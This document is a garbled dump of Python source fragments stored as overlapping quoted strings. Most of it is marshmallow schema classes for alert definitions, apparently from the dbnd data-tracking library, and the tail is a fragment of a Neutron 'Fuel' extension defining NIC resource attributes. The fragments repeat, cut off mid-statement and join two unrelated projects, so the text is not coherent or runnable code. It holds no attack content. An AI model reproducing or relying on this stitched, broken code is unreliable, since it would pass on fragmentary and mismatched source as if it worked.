allow_none=True) #", "= fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value =", "fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr =", "fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\")", "project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value", "data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True)", "severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert", "= fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json =", "value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True)", "return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\",", "is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env", "fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True)", "scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate", "**kwargs): value = data.get(\"value\", None) if value is not None: data[\"value\"] = str(data[\"value\"])", "fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator", "user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True)", "fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value", "= fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name =", "pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity =", "None=any) to filter stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found", "lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def", "datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert", "= fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid =", "def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data:", "airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool()", "allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description =", "jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self,", "value is not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type =", "fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta", "affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\",", "ApiStrictSchema from dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back =", "dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def", "in dbnd_web. Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only", "== \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return", "= fields.List(fields.Dict(), allow_none=True) # Used only used by the UI affected_datasets = fields.List(fields.Dict(),", "dict, **kwargs): value = data.get(\"value\", None) if value is not None: data[\"value\"] =", "= fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary =", "dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class", "= fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid =", "# Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to", "fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True)", "alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary", "= fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\")", "fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True)", "fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields", "fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs =", "-------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids =", "custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value", "= fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True)", "= fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # --------------------------------------", "if value is not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type", "AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator = fields.Str()", "task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json", "fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool()", "return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def", "= fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name =", "from dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer()", "for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name", "# Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields", "is not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True)", "= fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value =", "env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id =", "fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name", "datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid =", "only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function(", "obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load", "tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator", "fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, )", "fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\")", "Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g.", "fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name =", "ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta =", "self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source", "= fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name =", "import ApiStrictSchema from dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back", "= fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info", "obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job:", "None) if value is not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema):", "@pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value is", "type = fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at", "job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True)", "= fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert =", "metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by the UI affected_datasets =", "ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name =", "Type of MetricRule, found in dbnd_web. Used to build advanced_json metrics_rules = fields.List(fields.Dict(),", "= fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner", "= fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True)", ") def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self,", "= fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True)", "allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts", "used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda", "= fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value =", "fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid =", "fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True)", "= fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name", "custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert #", "# Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type", "= fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str()", "project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid", "= fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load", "= fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if", "dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any) to filter stats", "dbnd_web. Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used", "data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric", "summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True)", "uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name", "dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert #", "MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type", "fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name", "= fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used to build advanced_json", "OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\",", "return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return", "severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value", "# Operation type (e.g. \"read\", \"write\", None=any) to filter stats by operation_type =", "fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime()", "fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid", "= fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE:", "= fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return", "= fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data:", "fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) #", "Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by", "obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value =", "fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True)", "fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict,", "= str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity", "created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") #", "source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name =", "task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid", "= fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any) to filter stats by", "def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value is not", "type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value", "dbnd._core.tracking.schemas.base import ApiStrictSchema from dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float()", "= fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at =", "not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid", "fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\")", "= data.get(\"value\", None) if value is not None: data[\"value\"] = str(data[\"value\"]) return data", "for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\",", "is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj):", "data.get(\"value\", None) if value is not None: data[\"value\"] = str(data[\"value\"]) return data class", "advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by the UI affected_datasets", "= fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid", "= fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name", "alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any)", "fields.List(fields.Dict(), allow_none=True) # Used only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True,", "allow_none=True) # Used only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True)", "= fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True)", "TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\")", "= fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert =", "sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type =", "from dbnd._core.tracking.schemas.base import ApiStrictSchema from dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity =", "value = data.get(\"value\", None) if value is not None: data[\"value\"] = str(data[\"value\"]) return", "advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True)", "data: dict, **kwargs): value = data.get(\"value\", None) if value is not None: data[\"value\"]", "scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for", "(e.g. \"read\", \"write\", None=any) to filter stats by operation_type = fields.Str(allow_none=True) # Type", "= fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid =", "def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj):", "def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return", "operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(),", "dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self,", "obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value", "user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name", "to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert", "look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric =", "allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation", "# Type of MetricRule, found in dbnd_web. Used to build advanced_json metrics_rules =", "self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self,", "= fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value =", "= fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) #", "allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def", "type (e.g. \"read\", \"write\", None=any) to filter stats by operation_type = fields.Str(allow_none=True) #", "to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by the", "# -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids", "str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity =", "custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None)", "fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True)", "fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True)", "allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True)", "= fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env =", "obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None)", "build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by the UI" ]
[ "'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "None } }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return", "= [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-')", "neutron.api.v2 import attributes as attr from neutron.api.v2 import base from neutron.common import exceptions", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'pxe': { 'allow_post':", "'-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name,", "'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "None } }, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "None } }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod", "<reponame>rmoe/fuel-neutron from neutron.api.extensions import ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes", "import base from neutron.common import exceptions as nexception from neutron import manager from", "'validate': { 'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } } }", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'interface_properties': {", "'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id':", "import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\") NICS", "None } }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "extensions from neutron.api.v2 import attributes as attr from neutron.api.v2 import base from neutron.common", "None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "}, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed': {", "my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin", "class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel'", "'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put':", "'validate': { 'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible':", "attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name =", "collection_name = resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name)", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes':", "base from neutron.common import exceptions as nexception from neutron import manager from neutron.quota", "get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1])", "attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\")", "'validate': { 'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'default': '', 'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put':", "import extensions from neutron.api.v2 import attributes as attr from neutron.api.v2 import base from", "neutron.common import exceptions as nexception from neutron import manager from neutron.quota import resource_registry", "attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex)", "'2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key", "'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True", "'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True", "as attr from neutron.api.v2 import base from neutron.common import exceptions as nexception from", "= resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller", "nexception from neutron import manager from 